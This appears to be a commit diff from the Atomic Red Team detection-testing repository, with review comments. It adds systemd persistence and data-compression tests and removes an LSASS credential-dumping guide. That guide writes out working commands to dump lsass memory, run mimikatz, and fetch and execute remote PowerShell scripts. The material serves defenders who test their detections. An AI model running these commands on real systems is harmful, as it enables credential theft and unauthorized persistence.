| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | | | | | | |
| | | | | Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | | | NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) | | | | | | | |
| | | | | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | | | | | | |
File diff suppressed because it is too large Load Diff
+73
View File
@@ -0,0 +1,73 @@
---
attack_technique: RC13378
display_name: Systemd Service Creation
atomic_tests:
- name: Create Systemd Service
description: |
This test creates a Systemd service unit file and enables it as a service.
supported_platforms:
- linux
input_arguments:
execstart_action:
description: ExecStart action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstart-marker
execstartpre_action:
description: ExecStartPre action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpre-marker
execstartpost_action:
description: ExecStartPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpost-marker
execreload_action:
description: ExecReload action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execreload-marker
execstop_action:
description: ExecStop action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstop-marker
execstoppost_action:
description: ExecStopPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstoppost-marker
executor:
name: bash
command: |
echo "[Unit]" > /etc/systemd/system/art-systemd-service.service
echo "Description=Atomic Red Team Systemd Service" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Service]" >> /etc/systemd/system/art-systemd-service.service
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPre=#{execstartpre_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPost=#{execstartpost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecReload=#{execreload_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStop=#{execstop_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStopPost=#{execstoppost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Install]" >> /etc/systemd/system/art-systemd-service.service
echo "WantedBy=default.target" >> /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
systemctl enable art-systemd-service.service
systemctl start art-systemd-service.service
- name: Cleanup Systemd Test
description: |
This cleans up the remnants of the SystemD service unit file creation test.
supported_platforms:
- linux
executor:
name: bash
command: |
systemctl stop art-systemd-service.service
systemctl disable art-systemd-service.service
rm -rf /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
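Review bot: the `echo "Type=simple"` line in the executor command is missing the `>> /etc/systemd/system/art-systemd-service.service` redirection that every other `echo` in the block has, so `Type=simple` is printed to stdout and never written into the unit file; add the redirect so the generated `[Service]` section is complete. The description should also say the test has to run as root, since it writes under `/etc/systemd/system` and calls `systemctl enable`/`start`. Two smaller points: `attack_technique: RC13378` does not follow the `T####` ATT&CK ID pattern used by the other atomics in this commit (compare `attack_technique: T1002`), so if that is intentional it deserves a word in the description; and in the cleanup test `rm -rf` on a single unit file can simply be `rm -f`, since no directory is being removed.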
+111
View File
@@ -0,0 +1,111 @@
# T1002 - Data Compressed
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)
- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
- [Atomic Test #3 - Data Compressed - nix - zip](#atomic-test-3---data-compressed---nix---zip)
- [Atomic Test #4 - Data Compressed - nix - gzip Single File](#atomic-test-4---data-compressed---nix---gzip-single-file)
- [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file)
<br/>
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
#### Run it with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
<br/>
## Atomic Test #2 - Compress Data for Exfiltration With Rar
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | *.docx|
| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
#### Run it with `command_prompt`!
```
rar a -r #{output_file} #{input_file}
```
<br/>
<br/>
## Atomic Test #3 - Data Compressed - nix - zip
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
#### Run it with `sh`!
```
zip #{output_file} #{input_files}
```
<br/>
<br/>
## Atomic Test #4 - Data Compressed - nix - gzip Single File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
#### Run it with `sh`!
```
gzip -f #{input_file}
```
<br/>
<br/>
## Atomic Test #5 - Data Compressed - nix - tar Folder or File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
#### Run it with `sh`!
```
tar -cvzf #{output_file} #{input_file_folder}
```
<br/>
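Review bot: The default `input_file` of `C:\*` fed to `dir #{input_file} -Recurse | Compress-Archive` under Atomic Test #1 walks the whole system drive and will stall or throw access errors on locked system files; default it to a small staging folder the way the nix tests default to `/tmp/victim-files/`. The same gap runs through the rest of the file: none of the five tests has a cleanup step or a prerequisite that stages its input, so `/tmp/victim-files/*` must already exist for Tests #3 and #5, `gzip -f #{input_file}` in Test #4 replaces `/tmp/victim-gzip.txt` in place and leaves nothing to re-run against, and Test #2 assumes `rar` is on PATH with no check. Tests that leave `C:\test\Data.zip`, `exfilthis.rar` and `/tmp/victim-files.tar.gz` behind also need a cleanup section so a detection lab can be reset between runs.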
+98
@@ -0,0 +1,98 @@
---
attack_technique: T1002
display_name: Data Compressed
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: C:\*
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: C:\test\Data.zip
executor:
name: powershell
command: |
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
- name: Compress Data for Exfiltration With Rar
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: "*.docx"
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: exfilthis.rar
executor:
name: command_prompt
command: |
rar a -r #{output_file} #{input_file}
- name: Data Compressed - nix - zip
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_files:
description: Path that should be compressed into our output file, may include wildcards
type: Path
default: /tmp/victim-files/*
output_file:
description: Path that should be output as a zip archive
type: Path
default: /tmp/victim-files.zip
executor:
name: sh
command: |
zip #{output_file} #{input_files}
- name: Data Compressed - nix - gzip Single File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: Path that should be compressed
type: Path
default: /tmp/victim-gzip.txt
executor:
name: sh
command: |
gzip -f #{input_file}
- name: Data Compressed - nix - tar Folder or File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file_folder:
description: Path that should be compressed
type: Path
default: /tmp/victim-files/
output_file:
description: File that should be output
type: Path
default: /tmp/victim-files.tar.gz
executor:
name: sh
command: |
tar -cvzf #{output_file} #{input_file_folder}
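Review bot: The five test entries in this YAML carry no `auto_generated_guid`, `elevation_required` or `cleanup_command` keys, while the T1003.001 YAML removed later in this same diff records them on every test; add them here so the generated docs and any harness that keys on the GUID treat these tests consistently. That later file also shows the schema supports `dependency_executor_name` and a `dependencies` list with `prereq_command` / `get_prereq_command`; use it here to create `/tmp/victim-files/` and `/tmp/victim-gzip.txt` before the `sh` executors run, since as written the zip and tar commands fail on a clean host and `gzip -f #{input_file}` consumes its own input. The `rar a -r` executor needs the same treatment with a check that `rar` is installed.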
-653
@@ -1,653 +0,0 @@
# T1003.001 - OS Credential Dumping: LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run using:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
Built-in Windows tools such as comsvcs.dll can also be used:
* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
- [Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5](#atomic-test-11---dump-lsass-with-createdumpexe-from-net-v5)
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
<br/>
## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{dumpert_exe}
```
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
<br/>
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
**Supported Platforms:** Windows
**auto_generated_guid:** dddd4aca-bbed-46f0-984d-e4c5971c51ea
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
```
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
```
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path #{mimikatz_exe} | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
<br/>
<br/>
## Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live lsa
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #10 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
